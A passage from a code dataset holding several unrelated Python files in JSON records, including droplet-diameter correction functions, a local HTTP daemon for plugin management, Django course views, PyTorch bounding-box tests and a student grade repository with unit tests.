7.036\n \n D_ReuterBakan=np.zeros(len(Diameter25))*np.nan\n for i in range(len(Diameter25)) :\n #D_ReuterBakan[i] = (C*Diameter25[i] + D) * AreaFraction0[i] + (E*Diameter[i] + F)\n D_ReuterBakan[i] = (Diameter25[i] - D - F*AreaFraction0[i]) / (E*AreaFraction0[i] + C)\n \n return D_ReuterBakan\n\n\n\n\n#_______________________________________________________________________________________ \n\n\n \ndef KorolevCorrectedD(FilledArea, VoidArea,Diameter):\n \n CorrFactArray=np.empty(len(Diameter), dtype=float)\n Dspot_Dmax, Dmax_D0=GetKorolevRatios()\n for i in range(len(Diameter)):\n CorrFactArray[i]=KorolevCorrection(Dspot_Dmax, Dmax_D0,VoidArea[i],FilledArea[i])\n \n D_KorolevCorr=Diameter*CorrFactArray\n \n return D_KorolevCorr\n#_______________________________________________________________________________________ \n \n \ndef KorolevCorrection(Dspot_Dmax, Dmax_D0,VoidAreaElement,FilledAreaElement): \n #KorolevRatios= KorolevCorrection()\n #KorolevRatiosArray=KorolevRatios.values\n #Dspot_Dmax=KorolevRatiosArray[:,3]\n #Dmax_D0=KorolevRatiosArray[:,1]\n if VoidAreaElement>0 and FilledAreaElement>0:\n scaleF = 4/math.pi\n PixelRatio = math.sqrt(VoidAreaElement*scaleF)/math.sqrt(FilledAreaElement*scaleF)\n pos=(np.abs(Dspot_Dmax-PixelRatio)).argmin()\n CorrFac = 1/Dmax_D0[pos]\n else:\n CorrFac=1\n \n return CorrFac\n #pos = binarysearchinterp(Dspot_Dmax,pixelRatio)\n#_______________________________________________________________________________________ \n\ndef GetKorolevRatios():\n KorolevRatios = pd.read_csv('C:/Users/Admin TEMP/Documents/DropletGun/Korolev07_ratios.csv')\n KorolevRatiosArray=KorolevRatios.values\n Dspot_Dmax=KorolevRatiosArray[:,3]\n Dmax_D0=KorolevRatiosArray[:,1]\n \n return Dspot_Dmax, Dmax_D0 \n\n#_________________________________________________________________________________________________ \n\ndef GetKorolevRatios_Zd():\n KorolevRatios = pd.read_csv('C:/Users/Admin TEMP/Documents/DropletGun/Korolev07_ratios_withZd.csv')\n KorolevRatiosArray=KorolevRatios.values\n \n Z_d=KorolevRatiosArray[:,0]\n Dspot_Dmax=KorolevRatiosArray[:,1]\n Dspot_Dimg=KorolevRatiosArray[:,2]\n Dmax_D0=KorolevRatiosArray[:,3]\n Dimg_Dmax=KorolevRatiosArray[:,4]\n \n return Z_d,Dspot_Dmax,Dspot_Dimg,Dmax_D0,Dimg_Dmax\n\n\n#_______________________________________________________________________________________ \n \n\n# correction factor for diameter derived from areafraction2 \n \ndef Level2_D_Correction_vector(Diameter, AreaFraction2,VoidRatio) :\n \n CorrFactArray=np.empty(len(Diameter), dtype=float)\n Z_d,Dspot_Dmax,Dspot_Dimg,Dmax_D0,Dimg_Dmax= GetKorolevRatios_Zd()\n \n for i in range(len(Diameter)):\n CorrFactArray[i]=Level2_D_Correction(Z_d, Dmax_D0, AreaFraction2[i],VoidRatio[i])\n \n D_AreaFraction2Corr=Diameter*CorrFactArray\n \n return D_AreaFraction2Corr\n#_______________________________________________________________________________________ \n \n \n \ndef Level2_D_Correction(LookUp_Zd,Dmax_D0, AreaFraction2, VoidRatio): \n\n a= 1.02254\n b= -1.08683\n c= 0.840135\n \n #LookUp_areafraction2= a*LookUp_Zd**2 + b*LookUp_Zd + c \n LookUp_areafraction2=(np.where(LookUp_Zd<0.5,a*LookUp_Zd**2 + b*LookUp_Zd + c,0))\n \n \n if AreaFraction2 > 0.55 and AreaFraction2 < 0.8 and VoidRatio == 0 :\n pos=(np.abs(LookUp_areafraction2-AreaFraction2)).argmin()\n CorrFac = 1/Dmax_D0[pos]\n else:\n CorrFac=1\n \n return CorrFac\n\n#_______________________________________________________________________________________ \n\n\n\n\n","sub_path":"Old/MyFunctions07092018.py","file_name":"MyFunctions07092018.py","file_ext":"py","file_size_in_byte":23191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"157016734","text":"from threading import Thread\r\nfrom http.server import HTTPServer\r\nfrom core.server.HTTPRequestHandler import HTTPRequestHandler\r\nimport requests\r\n\r\nclass DaemonServer():\r\n \"\"\"\r\n The DaemonServer is a minimalist http server that will allow interface\r\n to manage the daemon.\r\n \"\"\"\r\n\r\n _user = {}\r\n _is_log = False\r\n\r\n def __init__(self, daemon, base_url):\r\n \"\"\"\r\n Initializer\r\n\r\n @param daemon: a reference to the daemon object\r\n @type daemon: Daemon\r\n @param base_url: the API URL\r\n @type base_url: string\r\n \"\"\"\r\n self._is_running = False\r\n self._httpd = None\r\n self._th = None\r\n DaemonServer._daemon = daemon\r\n DaemonServer._base_url = base_url\r\n DaemonServer._mock_url = \"http://127.0.0.1:3000\"\r\n\r\n @staticmethod\r\n @HTTPRequestHandler.get('/')\r\n def index(request):\r\n \"\"\"\r\n This URL is a test to be sure that the DaemonServer can handle a request\r\n \"\"\"\r\n return requests.get(DaemonServer._mock_url + '/')\r\n\r\n @staticmethod\r\n @HTTPRequestHandler.post('/login')\r\n def post_user_login(request):\r\n \"\"\"\r\n Login\r\n \"\"\"\r\n data = {'email': request.fields['email'], 'password': request.fields['password']}\r\n res = requests.post(DaemonServer._base_url + '/user/login.json', data=data)\r\n if res.ok:\r\n DaemonServer._is_log = True\r\n DaemonServer._user['_token'] = res.json()['data']\r\n DaemonServer._user['_email'] = request.fields['email'][0]\r\n return res\r\n\r\n @staticmethod\r\n @HTTPRequestHandler.get('/logout')\r\n def get_user_logout(request):\r\n \"\"\"\r\n Logout\r\n \"\"\"\r\n auth = (DaemonServer._user['_email'], DaemonServer._user['_token'])\r\n res = requests.get(DaemonServer._base_url + '/user/logout.json', auth=auth)\r\n if res.ok:\r\n DaemonServer._is_log = False\r\n DaemonServer._token = None\r\n return res\r\n\r\n @staticmethod\r\n @HTTPRequestHandler.get('/me')\r\n def get_user_me(request):\r\n \"\"\"\r\n Informations about the user\r\n \"\"\"\r\n auth = (DaemonServer._user['_email'], DaemonServer._user['_token'])\r\n res = requests.get(DaemonServer._base_url + '/user/me.json', auth=auth)\r\n return res\r\n\r\n # mock\r\n @staticmethod\r\n @HTTPRequestHandler.get('/plugins/')\r\n def get_plugins(request):\r\n \"\"\"\r\n List of all plugins\r\n \"\"\"\r\n res = requests.get(DaemonServer._mock_url + '/plugins')\r\n return res\r\n\r\n # mock\r\n @staticmethod\r\n @HTTPRequestHandler.get('/plugins/:id')\r\n def get_plugin(request):\r\n \"\"\"\r\n Get a specific plugin\r\n\r\n Url param:\r\n id -> plugin ID\r\n \"\"\"\r\n res = requests.get(DaemonServer._mock_url + '/plugins/' + request.url_vars['id'])\r\n return res\r\n\r\n @staticmethod\r\n @HTTPRequestHandler.get('/plugins/:author/:plugin_name/download')\r\n def get_download_plugin(request):\r\n \"\"\"\r\n Download a plugin\r\n\r\n Url param:\r\n author -> the plugin's author\r\n plugin_name -> the plugin's name\r\n \"\"\"\r\n auth = (DaemonServer._user['_email'], DaemonServer._user['_token'])\r\n res = requests.get(DaemonServer._base_url + '/plugins/' + request.url_vars['author'] + '/' + request.url_vars['plugin_name'] + '/download', auth=auth)\r\n if res.ok:\r\n download_url = res.json()['url']\r\n download_path = DaemonServer._daemon._config.get('plugin_folder_download')\r\n download_path = DaemonServer._daemon._config.resolve_path_from_root(download_path, request.url_vars['plugin_name'])\r\n DaemonServer.__download_file(download_path, download_url, extension='.zip')\r\n return res\r\n\r\n @staticmethod\r\n @HTTPRequestHandler.get('/plugins/:plugin_name/install')\r\n def get_install_plugin(request):\r\n \"\"\"\r\n Install a plugin\r\n\r\n Url param:\r\n plugin_name -> the plugin's name\r\n \"\"\"\r\n plugin_path = DaemonServer._daemon._config.get('plugin_folder_download')\r\n plugin_path = DaemonServer._daemon._config.resolve_path_from_root(plugin_path, request.url_vars['plugin_name'] + '.zip')\r\n res = requests.Response()\r\n DaemonServer._daemon.install_plugin(plugin_path)\r\n res.status_code = 200\r\n return res\r\n\r\n @staticmethod\r\n @HTTPRequestHandler.delete('/plugins/:plugin_name')\r\n def delete_uninstall_plugin(request):\r\n \"\"\"\r\n Uninstall a plugin\r\n\r\n Url param:\r\n plugin_name -> the plugin's name\r\n \"\"\"\r\n plugin_name = request.url_vars['plugin_name']\r\n res = requests.Response()\r\n DaemonServer._daemon.uninstall_plugin(plugin_name)\r\n res.status_code = 200\r\n return res\r\n\r\n @staticmethod\r\n @HTTPRequestHandler.get('/plugins/:plugin_name/enable')\r\n def get_enable_plugin(request):\r\n \"\"\"\r\n Enable a plugin\r\n\r\n Url param:\r\n plugin_name -> the plugin's name\r\n \"\"\"\r\n plugin_name = request.url_vars['plugin_name']\r\n res = requests.Response()\r\n if DaemonServer._daemon.enable_plugin(plugin_name):\r\n res.status_code = 200\r\n else:\r\n res.status_code = 400\r\n return res\r\n\r\n @staticmethod\r\n @HTTPRequestHandler.get('/plugins/:plugin_name/disable')\r\n def get_disable_plugin(request):\r\n \"\"\"\r\n Disable a plugin\r\n\r\n Url param:\r\n plugin_name -> the plugin's name\r\n \"\"\"\r\n plugin_name = request.url_vars['plugin_name']\r\n res = requests.Response()\r\n if DaemonServer._daemon.disable_plugin(plugin_name):\r\n res.status_code = 200\r\n else:\r\n res.status_code = 400\r\n return res\r\n\r\n @staticmethod\r\n def __download_file(file_path, url, extension=''):\r\n \"\"\"\r\n Private method allowing to download a file and save it on specified path\r\n\r\n @param file_path: the local path where the file will be saved\r\n @type file_path: string\r\n @param url: the url allownig the download\r\n @type url: string\r\n @param extension: extension of the local file\r\n @type extension: string\r\n \"\"\"\r\n auth = (DaemonServer._user['_email'], DaemonServer._user['_token'])\r\n res = requests.get(DaemonServer._base_url + url, auth=auth, stream=True)\r\n with open(file_path + extension, 'wb') as dfile:\r\n for chunk in res.iter_content(chunk_size=1024):\r\n if chunk:\r\n dfile.write(chunk)\r\n\r\n def run(self, adress='127.0.0.1', port=8001):\r\n \"\"\"\r\n Start the DaemonServer by listening on the specified adress\r\n\r\n @param adress: adress to listen on\r\n @type adress: string\r\n @param port: port to listen on\r\n @type port: int\r\n \"\"\"\r\n self._httpd = HTTPServer((adress, port), HTTPRequestHandler)\r\n self._is_running = True\r\n self._th = Thread(None, self._httpd.serve_forever)\r\n self._th.start()\r\n print('DaemonServer is listening on %s:%d' % (adress, port))\r\n\r\n def stop(self):\r\n \"\"\"\r\n Stop the DaemonServer\r\n \"\"\"\r\n print('Stopping the DaemonServer...')\r\n self._httpd.shutdown()\r\n self._th.join()\r\n self._is_running = False\r\n","sub_path":"core/server/DaemonServer.py","file_name":"DaemonServer.py","file_ext":"py","file_size_in_byte":7489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"589401280","text":"from django.shortcuts import render, redirect\nfrom .models import Course\n\n# Create your views here.\ndef index(request):\n context = {\n 'courses': Course.objects.all()\n }\n return render(request, 'course/index.html', context)\n\ndef add_course(request):\n if request.method == 'POST':\n Course.objects.create(course_name=request.POST['course_name'], description=request.POST['description'])\n return redirect('/')\n\ndef prompt_destroy(request, course_id):\n context = {\n 'course': Course.objects.get(id=course_id)\n }\n return render(request, 'course/destroy.html', context)\n\ndef destroy(request, course_id):\n if request.method == 'POST':\n Course.objects.filter(id=course_id).delete()\n return redirect('/')\n","sub_path":"Python/Flask-MySQL-Python/Django/courses/apps/course/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"228652784","text":"import torch\nimport pytest\nimport pytorch_tools as pt\n\n\ndef random_boxes(mean_box, stdev, N):\n return torch.rand(N, 4) * stdev + torch.tensor(mean_box, dtype=torch.float)\n\n\n# fmt: off\nDEVICE_DTYPE = [\n (\"cpu\", torch.float), \n (\"cuda\", torch.float), \n (\"cuda\", torch.half)\n]\n# fmt: on\n# check that it works for all combinations of dtype and device\n@pytest.mark.parametrize(\"device_dtype\", DEVICE_DTYPE)\ndef test_clip_bboxes(device_dtype):\n device, dtype = device_dtype\n # fmt: off\n bboxes = torch.tensor(\n [\n [-5, -10, 50, 100],\n [10, 15, 20, 25],\n ],\n device=device,\n dtype=dtype,\n )\n expected_bboxes = torch.tensor(\n [\n [0, 0, 40, 60],\n [10, 15, 20, 25],\n ],\n device=device,\n dtype=dtype,\n )\n # fmt: on\n size = (60, 40)\n # test single bbox clip\n res1 = pt.utils.box.clip_bboxes(bboxes, size)\n assert torch.allclose(res1, expected_bboxes)\n # test single bbox clip passing torch.Size\n res2 = pt.utils.box.clip_bboxes(bboxes, torch.Size(size))\n assert torch.allclose(res2, expected_bboxes)\n\n BS = 4\n batch_bboxes = bboxes.unsqueeze(0).expand(BS, -1, -1)\n batch_expected = expected_bboxes.unsqueeze(0).expand(BS, -1, -1)\n batch_sizes = torch.tensor(size).repeat(BS, 1)\n # test batch clipping\n res3 = pt.utils.box.clip_bboxes_batch(batch_bboxes.clone(), batch_sizes)\n assert torch.allclose(res3, batch_expected)\n\n # check that even in batch mode we can pass single size\n res4 = pt.utils.box.clip_bboxes_batch(batch_bboxes.clone(), torch.tensor(size))\n assert torch.allclose(res4, batch_expected)\n\n jit_clip = torch.jit.script(pt.utils.box.clip_bboxes_batch)\n # check that function is JIT script friendly\n res5 = jit_clip(batch_bboxes.clone(), batch_sizes)\n assert torch.allclose(res5, batch_expected)\n\n\n@pytest.mark.parametrize(\"device_dtype\", DEVICE_DTYPE)\ndef test_delta2box(device_dtype):\n device, dtype = device_dtype\n # fmt: off\n anchors = torch.tensor(\n [\n [ 0., 0., 1., 1.],\n [ 0., 0., 1., 1.],\n [ 0., 0., 1., 1.],\n [ 5., 5., 5., 5.]\n ],\n device=device,\n dtype=dtype,\n )\n deltas = torch.tensor(\n [\n [ 0., 0., 0., 0.],\n [ 1., 1., 1., 1.],\n [ 0., 0., 2., -1.],\n [ 0.7, -1.9, -0.5, 0.3]\n ],\n device=device,\n dtype=dtype,\n )\n # by default we don't expect results to be clipped\n expected_res = torch.tensor(\n [\n [0.0000, 0.0000, 1.0000, 1.0000],\n [0.1409, 0.1409, 2.8591, 2.8591],\n [-3.1945, 0.3161, 4.1945, 0.6839],\n [5.0000, 5.0000, 5.0000, 5.0000],\n ],\n device=device,\n dtype=dtype,\n )\n # fmt: on\n res1 = pt.utils.box.delta2box(deltas, anchors)\n assert torch.allclose(res1, expected_res, atol=3e-4)\n\n BS = 4\n batch_anchors = anchors.unsqueeze(0).expand(BS, -1, -1)\n batch_deltas = deltas.unsqueeze(0).expand(BS, -1, -1)\n batch_expected = expected_res.unsqueeze(0).expand(BS, -1, -1)\n\n # test applying to batch\n res2 = pt.utils.box.delta2box(batch_deltas.clone(), batch_anchors)\n assert torch.allclose(res2, batch_expected, atol=3e-4)\n\n # check that function is JIT script friendly\n jit_func = torch.jit.script(pt.utils.box.delta2box)\n res3 = jit_func(batch_deltas.clone(), batch_anchors)\n assert torch.allclose(res3, batch_expected, atol=3e-4)\n\n\n@pytest.mark.parametrize(\"device_dtype\", DEVICE_DTYPE)\ndef test_box2delta(device_dtype):\n ## this test only checks that encoding and decoding gives the same result\n device, dtype = device_dtype\n boxes = random_boxes([10, 10, 20, 20], 10, 10).to(device).to(dtype)\n anchors = random_boxes([10, 10, 20, 20], 10, 10).to(device).to(dtype)\n deltas = pt.utils.box.box2delta(boxes, anchors)\n boxes_reconstructed = pt.utils.box.delta2box(deltas, anchors)\n atol = 2e-2 if dtype == torch.half else 1e-6 # for fp16 sometimes error is large\n assert torch.allclose(boxes, boxes_reconstructed, atol=atol)\n\n # check that it's jit friendly\n jit_box2delta = torch.jit.script(pt.utils.box.box2delta)\n jit_delta2box = torch.jit.script(pt.utils.box.delta2box)\n deltas2 = jit_box2delta(boxes, anchors)\n boxes_reconstructed2 = jit_delta2box(deltas2, anchors)\n assert torch.allclose(boxes, boxes_reconstructed2, atol=atol)\n","sub_path":"tests/utils/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":4505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"614005621","text":"import sys\nsys.path.append('..')\nfrom Domain.grade import *\nfrom Domain.assignment import *\nfrom Domain.student import *\nfrom Repositories.studentRepo import *\nfrom dataStruct.DataStruct import *\nimport datetime\nimport unittest\n\nclass GradeRepository:\n def __init__(self):\n self._gList = DataStruct()\n def store(self, grade):\n self._gList.append(grade)\n def get_grade_list(self):\n return self._gList.getList()\n def get_specific_grade(self, sID, aID):\n lst = self._gList.getList()\n for grade in lst:\n if(grade.get_student() == sID and grade.get_assignment() == aID):\n return grade._grade\n def get_student_grades(self, sID):\n lst = self._gList.getList()\n gL = []\n for grade in lst:\n if(grade.get_student() == sID):\n gL.append(grade)\n return gL\n def get_assignment_grades(self, aID):\n lst = self._gList.getList()\n gL = []\n for grade in lst:\n if(grade.get_assignment() == aID):\n gL.append(grade)\n return gL\n def get_student_average(self, sID):\n total = 0\n avg = 0\n nr = 0\n if(self.isStudent(sID)):\n for grade in self._gList.getList():\n if(grade.get_student() == sID):\n total += grade.get_grade()\n nr += 1\n avg = total/nr\n return avg\n def get_assignment_average(self, aID):\n total = 0\n avg = 0\n nr = 0\n for grade in self._gList.getList():\n if(grade.get_assignment() == aID):\n total += grade.get_grade()\n nr += 1\n avg = total/nr\n return avg\n def isAssignment(self, aID):\n lst = self.get_grade_list()\n for i in range(0, len(lst)):\n if(lst[i].get_assignment() == aID):\n return True\n return False\n def isStudent(self, sID):\n lst = self.get_grade_list()\n for grade in lst:\n if(grade.get_student() == sID):\n return True\n return False\n def delete_assignment_grading(self, aID):\n lst = self.get_grade_list()\n while(self.isAssignment(aID)):\n for i in range(0, len(lst)):\n if(lst[i].get_assignment() == aID):\n del lst[i]\n break\n def delete_student_grading(self, sID):\n lst = self.get_grade_list()\n while(self.isStudent(sID)):\n for i in range(0, len(lst)):\n if(lst[i].get_student() == sID):\n del lst[i]\n break\n def delete_specific_grade(self, sID, aID):\n lst = self._gList.getList()\n for i in range(0, len(lst)):\n if(lst[i].get_student() == sID and lst[i].get_assignment() == aID):\n del lst[i]\n break\n def isGraded(self, sID, aID):\n lst = self.get_grade_list()\n for grade in lst:\n if(grade.get_student() == sID and grade.get_assignment() == aID):\n return True\n return False\n #SORT HERE\n def gradedAssignments(self, asgnList):\n lst = []\n for assignment in asgnList:\n if(self.isAssignment(assignment.getID()) == True):\n avg = self.get_assignment_average(assignment.getID())\n lst.append((assignment.getID(), avg))\n for i in range(0, len(lst)-1):\n for j in range(i+1, len(lst)):\n if(lst[i][1] < lst[j][1]):\n aux = lst[i]\n lst[i] = lst[j]\n lst[j] = aux\n return lst\n #SORT HERE\n def students_by_average(self, studentRepo, aID):\n lst = []\n sRepo = studentRepo\n sList = sRepo.get_student_list()\n newList = []\n for student in sList:\n if(aID in student.getAssignmentList()):\n lst.append(student)\n for student in lst:\n avg = self.get_student_average(student.getID())\n if(avg != 0):\n newList.append((student, avg))\n for i in range(0, len(sList)-1):\n for j in range(i+1, len(newList)):\n if(newList[i][1] < newList[j][1]):\n aux = newList[i]\n newList[i] = newList[j]\n newList[j] = aux\n return newList\n def student_alphabetical(self, studentRepo, aID):\n lst = []\n sRepo = studentRepo\n sList = sRepo.get_student_list()\n newList = []\n for student in sList:\n if(aID in student.getAssignmentList()):\n lst.append(student)\n for student in lst:\n avg = self.get_student_average(student.getID())\n if(avg != 0):\n newList.append((student, avg))\n for i in range(0, len(newList)-1):\n for j in range(i+1, len(newList)):\n if(newList[i][0].getName() > newList[j][0].getName()):\n aux = newList[i]\n newList[i] = newList[j]\n newList[j] = aux\n return newList\n def isLate(self, student):\n lst = student.getAssignmentList()\n sID = student.getID()\n for asgn in lst:\n if(not self.isGraded(sID, asgn)):\n return True\n print(\"LATE!\")\n return False\n def get_late_students(self, sList):\n lst = self.get_grade_list()\n lateList = []\n for i in range(0, len(sList)):\n student = sList[i]\n assignments = sList[i].getAssignmentList()\n for j in range(0 ,len(assignments)):\n if((not self.isGraded(student.getID(), assignments[j])) and self.isLate(student)):\n lateList.append((student, assignments[j]))\n return lateList\n #SORT HERE\n def sort_students_by_grade(self, studentRepo):\n sRepo = studentRepo\n sList = sRepo.get_student_list()\n newList = []\n for student in sList:\n avg = self.get_student_average(student.getID())\n newList.append((student, avg))\n for i in range(0, len(newList)-1):\n for j in range(i+1, len(newList)):\n if(newList[i][1] < newList[j][1]):\n aux = newList[i]\n newList[i] = newList[j]\n newList[j] = aux\n return newList\n def sort_assignments_by_average(self, asgnRepo):\n aRepo = asgnRepo\n aList = aRepo.getAssignmentList()\n newList = []\n for assignment in aList:\n avg = self.get_assignment_average(assignment.getID())\n newList.append((assignment, avg))\n for i in range(0, len(newList)-1):\n for j in range(i+1, len(newList)):\n if(newList[i][1] < newList[j][1]):\n aux = newList[i]\n newList[i] = newList[j]\n newList[j] = aux\n return newList\nclass TestGrade(unittest.TestCase):\n def setUp(self):\n self.gRepo = GradeRepository()\n self.g1 = Grade(12, \"A1\", 10, datetime.date(2017, 12, 1))\n self.g2 = Grade(12, \"A2\", 8, datetime.date(2017, 11, 2))\n self.g3 = Grade(13, \"A1\", 8, datetime.date(2017, 10, 23))\n self.gRepo.store(self.g1)\n self.gRepo.store(self.g2)\n self.gRepo.store(self.g3)\n def test_store(self):\n self.gRepo.store(self.g1)\n self.assertEqual(self.gRepo._gList, [self.g1, self.g2, self.g3, self.g1])\n self.assertNotEqual(self.gRepo._gList, [])\n def test_get(self):\n self.assertEqual(self.gRepo.get_grade_list(), [self.g1, self.g2, self.g3])\n self.assertEqual(self.gRepo.get_specific_grade(12, \"A1\"), 10)\n self.assertEqual(self.gRepo.get_student_average(12), 9.0)\n self.assertEqual(self.gRepo.get_assignment_average(\"A1\"), 9)\n def test_isAssignment(self):\n self.assertTrue(self.gRepo.isAssignment(\"A1\"))\n self.assertFalse(self.gRepo.isAssignment(\"A3\"))\n def test_isStudent(self):\n self.assertTrue(self.gRepo.isStudent(12))\n self.assertFalse(self.gRepo.isAssignment(24))\n def test_isGraded(self):\n self.assertTrue(self.gRepo.isGraded(12, \"A1\"))\n self.assertFalse(self.gRepo.isGraded(13, \"A2\"))\n def test_deletion(self):\n self.gRepo.delete_student_grading(12)\n self.assertEqual(self.gRepo.get_grade_list(), [self.g3])\n self.gRepo.store(self.g1)\n self.gRepo.store(self.g2)\n self.gRepo.delete_assignment_grading(\"A1\")\n self.assertEqual(self.gRepo.get_grade_list(), [self.g2])\n self.gRepo.store(self.g1)\n self.gRepo.store(self.g3)\n self.gRepo.delete_specific_grade(12, \"A1\")\n self.assertEqual(self.gRepo.get_grade_list(), [self.g2, self.g3])\n def test_gradedAssignments(self):\n a1 = Assignment(\"A1\", \"Lorem\", datetime.date(2017, 12, 1))\n a2 = Assignment(\"A2\", \"Ipsum\", datetime.date(2017, 11, 12))\n self.assertEqual(self.gRepo.gradedAssignments([a1, a2]), [(\"A1\", 9), (\"A2\", 8)])\n def test_sortAvg(self):\n sRepo = StudentRepo()\n s1 = Student(12, \"Darjan\", \"912\")\n s2 = Student(13, \"Andrei\", \"912\")\n sRepo.store(s1)\n sRepo.store(s2)\n lst = self.gRepo.students_by_average(sRepo, \"A1\")\n self.assertEqual(lst, [])\n def test_getSG(self):\n self.assertEqual(self.gRepo.get_student_grades(12), [self.g1, self.g2])\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"Repositories/gradeRepo.py","file_name":"gradeRepo.py","file_ext":"py","file_size_in_byte":9510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"86527068","text":"__author__ = 'pougomg'\n\nimport motor\nimport tornado\nimport numpy as np\nimport pandas as pd\nimport wrds\nfrom pymongo import UpdateOne\nfrom bson.objectid import ObjectId\n\nfrom aBlackFireCapitalClass.ClassPriceRecommendationData.ClassPriceRecommendationDataInfos import \\\n PriceTargetAndconsensusInfosData\nfrom zBlackFireCapitalImportantFunctions.SetGlobalsFunctions import type_consensus, type_price_target\n\n\ndef SetStocksInfosRecommendationsInDB(type, connectionstring):\n\n \"\"\"\n This function set all the Stocks Recommendations Infos in the DB.\n :param:\n type: price_target/consensus DB\n connectionstring. The DB location where the data will be store.\n\n \"\"\"\n\n if type == type_consensus:\n db = wrds.Connection()\n res = db.raw_sql(\"select a.cusip, a.ticker from ibes.recddet a group by a.cusip, a.ticker\")\n db.close()\n elif type == type_price_target:\n db = wrds.Connection()\n res = db.raw_sql(\"select a.cusip, a.ticker from ibes.ptgdet a group by a.cusip, a.ticker\")\n db.close()\n else:\n error = \"Incorrection Argument Type It must be {} or {}.\"\n raise TypeError(error.format(type_price_target, type_consensus))\n\n dict_infos = dict()\n for pos in range(res.shape[0]):\n cusip = res['cusip'][pos]\n ticker = res['ticker'][pos]\n\n if cusip is None:\n cusip = ticker\n\n dict_infos[(cusip, ticker)] = {'ticker': ticker, 'cusip': cusip}\n\n if (cusip != ticker):\n if dict_infos.get((ticker, ticker), False):\n del dict_infos[(ticker, ticker)]\n data = []\n for key in dict_infos:\n data.append(dict_infos[key])\n ClientDB = motor.motor_tornado.MotorClient(connectionstring)\n tornado.ioloop.IOLoop.current().run_sync(PriceTargetAndconsensusInfosData(ClientDB,type,data).SetInfosInDB)\n ClientDB.close()\n\n\ndef BulkSetData(_id, gvkey):\n\n return UpdateOne({\"_id\":ObjectId(_id)},{\"$set\":{\"gvkey\":gvkey}})\n\n\ndef SetGvkeyToInfosRecommendations(type_, connectionstring):\n\n \"\"\"This function is used to assign a GVKEY for the stocks Infos for Recommendations\"\"\"\n # tabStocksInFosGvkey = []\n # for value in StocksInFosGvkeyList:\n # tabStocksInFosGvkey.append([value[\"_id\"], value['cusip'], value['ticker']])\n\n\n tabStocksInfosGvkey = np.load('tabStocksInFosGvkey.npy')\n\n tabStocksRecommendationInfos = np.load('tabStocksConsensusInfos.npy')\n\n tabStocksInfosGvkey = pd.DataFrame(tabStocksInfosGvkey, columns=['gvkey', 'cusip', 'ticker'])\n\n tabStocksRecommendationInfos = pd.DataFrame(tabStocksRecommendationInfos, columns=['_id', 'cusip', 'ticker'])\n\n CusipFilterTab = tabStocksRecommendationInfos[tabStocksRecommendationInfos['cusip'] != None]\n\n\n CusipFilterTab = pd.merge(CusipFilterTab, tabStocksInfosGvkey, on='cusip')[['_id', 'gvkey']].set_index('_id')\n\n TickerFilterTab = tabStocksRecommendationInfos[tabStocksRecommendationInfos['ticker'] != None]\n TickerFilterTab = pd.merge(TickerFilterTab, tabStocksInfosGvkey, on='ticker')[['_id', 'gvkey']].set_index('_id')\n\n\n\n tabResult = pd.concat([TickerFilterTab, CusipFilterTab]).reset_index().drop_duplicates('_id')\n v = np.vectorize(BulkSetData)\n tabResult['data'] = v(tabResult['_id'], tabResult['gvkey'])\n print(tabResult[tabResult.gvkey == '062634'])\n\n data = list(tabResult['data'].values)\n ClientDB = motor.motor_tornado.MotorClient(connectionstring)\n tornado.\\\n ioloop.IOLoop.current().\\\n run_sync(PriceTargetAndconsensusInfosData(ClientDB,type_, data).SetInfosInDB)\n\n ClientDB.close()\n\n","sub_path":"bBlackFireCapitalData/StocksMarketData/StocksPriceRecommendationData/GetStocksInfosRecommendations.py","file_name":"GetStocksInfosRecommendations.py","file_ext":"py","file_size_in_byte":3599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"589857058","text":"#count ( < 100 )\ndef less_hundred(n):\n count = 0\n for i in range(n):\n count += 1\n print(count)\n#count ( >= 100 and < 1000)\ndef more_hundred(n):\n count = 99\n for i in range(100, n + 1):\n num = str(i)\n list_n = list(map(int, num))\n if (list_n[0] - list_n[1]) == (list_n[1] - list_n[2]):\n count += 1\n print(count)\n#main\nn = int(input())\n\nif n < 100:\n less_hundred(n)\nelif n == 1000:\n print(144)\nelse:\n more_hundred(n)\n","sub_path":"1000~/Baek_1065.py","file_name":"Baek_1065.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"331663590","text":"from django.db import models\nfrom userprofile.models import UserProfile\nimport os\nfrom datetime import date\nfrom django.conf import settings\nfrom django.core.files.storage import FileSystemStorage\nfrom tinymce.models import HTMLField\nfrom amazon_file_field import S3Storage, S3EnabledImageField, S3EnabledFileField\nfrom boto.s3.key import Key\nfrom boto.s3.connection import S3Connection\n#-------------------------------------------------------------->\n# UTILITIES\n\n\ndef get_bucket():\n if settings.USE_AMAZON_S3:\n bucket = settings.AWS_STORAGE_BUCKET_NAME\n connection = S3Connection(settings.AWS_ACCESS_KEY_ID, settings.AWS_SECRET_ACCESS_KEY, host='s3.amazonaws.com')\n if not connection.lookup(bucket):\n connection.create_bucket(bucket)\n bucket = connection.get_bucket(bucket)\n return bucket\n\nUser = settings.AUTH_USER_MODEL\n\n\n# This class is used to create the file system storage used for files on OS.\n# It checks if the file exists and overwrites the file if it exists.\nclass OverwriteStorage(FileSystemStorage):\n\n def get_available_name(self, name):\n \"\"\"\n Returns a filename that's free on the target storage system, and\n available for new content to be written to.\n \"\"\"\n # If the filename already exists, remove it as if it was a true file system\n if self.exists(name):\n os.remove(os.path.join(settings.MEDIA_ROOT, name))\n return name\n\n\nclass CommonInfo(models.Model):\n name = models.CharField(max_length=100)\n\n def __unicode__(self):\n return self.name\n\n class Meta:\n abstract = True\n\n\nclass Price(CommonInfo):\n cost = models.DecimalField(max_digits=10, decimal_places=2)\n\n\nclass Sale(CommonInfo):\n percent_off = models.DecimalField(max_digits=10, decimal_places=2)\n\n\nclass Tag(models.Model):\n name = models.CharField(max_length=50)\n\n def 